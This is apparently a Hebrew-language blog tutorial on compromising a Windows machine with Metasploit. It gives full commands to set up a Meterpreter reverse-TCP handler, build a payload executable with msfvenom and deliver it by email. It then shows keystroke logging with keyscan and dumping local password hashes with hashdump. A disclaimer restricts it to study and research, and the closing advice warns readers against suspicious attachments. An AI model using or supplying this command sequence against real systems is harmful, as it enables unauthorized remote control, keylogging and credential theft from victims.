הכנת Payload והרצה על Windows בעזרת Metasploit: (ללא אנטי וירוס)

* מטרת מדריך זה היא שימוש לימודי ולצורכי מחקר בלבד! כל שימוש אחר יהיה על אחריות המשתמש! (המכשיר שעליו בוצע המדריך הוא מכשיר לבדיקות אבטחה בלבד!)





* ראשית ניכנס אל Metasploit Framework בעזרת הפקודה הבאה:

> msfconsole
 _                                                    _
/ \    /\         __                         _   __  /_/ __
| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_
      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\

* יש להיכנס אל handler ולטעון את ה-Payload הרצוי:
> use exploit/multi/handler

* לאחר שסיימנו את שלב איסוף הנתונים ואנחנו יודעים מהי מערכת ההפעלה המדויקת נטען Payload:
> set payload windows/meterpreter/reverse_tcp

* הפקודת Show Options, תציג את הדרישות של אותו ה-Payload.

* במקרה הנ"ל יש להזין כתובת IP (מקומית) ומספר פורט מקומי מכיוון שהתהליך הוא Reverse-Shell.
הגדרת כתובת תתבצע באמצעות set lhost 172.16.0.5 ופורט set lport 1234

* כעת יש להריץ ולהכניס למצב האזנה, המחשב שלנו יאזין עד שתגיע השיחה מהיעד.
ניתן להריץ באמצעות 2 פקודות זהות:
* run
* exploit


* כעת, כל שנותר הוא ליצור קובץ עם הפרטים הנדרשים ולהעבירו אל היעד. (msfvenom):
שימו לב היכן נשמר הקובץ, במקרה זה בחרתי שישמר בתיקייה הנוכחית בה אני נמצא.

msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.0.5 lport=4444 -f exe > file.exe

* ניתן להעביר את הקובץ במספר דרכים, לא אסבך והפעם נעביר את הקובץ במייל. לאחר שהעברנו את הקובץ אל היעד, נתחבר אליו באמצעות שולחן עבודה מרוחק, נלחץ על הקובץ, נפעיל אותו ונצא.


* מיד לאחר הרצת הקובץ, יפתח Session ונקבל Meterpreter.

* הפקודה help תציג רשימת פקודות שניתן לבצע, חלקן מופיעות בקישור הבא: http://www.omegaton.com/2017/04/meterpreter.html


שימוש בפקודת Key_scan:
לאחר שהמחשב בשליטתי המלאה ניתן להשתמש בפקודה:
keyscan_start - התחל הקלטת מקלדת
keyscan_dump - הצג את "הקלטת" המקלדת על המסך
keyscan_stop - עצור הקלטת מקלדת

פקודת Hashdump: תציג לנו את ה-Hash של כל המשתמשים המקומיים.

לסיום, שימו לב לפעולות שלכם ברשת האינטרנט, לא לפתוח קבצים חשודים, לא להתקין קבצים הנשלחים במייל או הורדו ממקור לא ידוע בנוסף.

* כמו כן ממליץ לכסות כל מצלמה פעילה: קדמית, אחורית וגם את זו של המחשב.

ידע זה כוח, נצלו אותו ובעזרתו שמרו על עצמכם ועל הסובבים אתכם למען סביבה בטוחה יותר!
שתף:

פאביו ליאור רחמים

סקרן, אוהב טכנולוגיה ומחשבים מזה שנים רבות וכותב ערכים קבוע בויקיפדיה.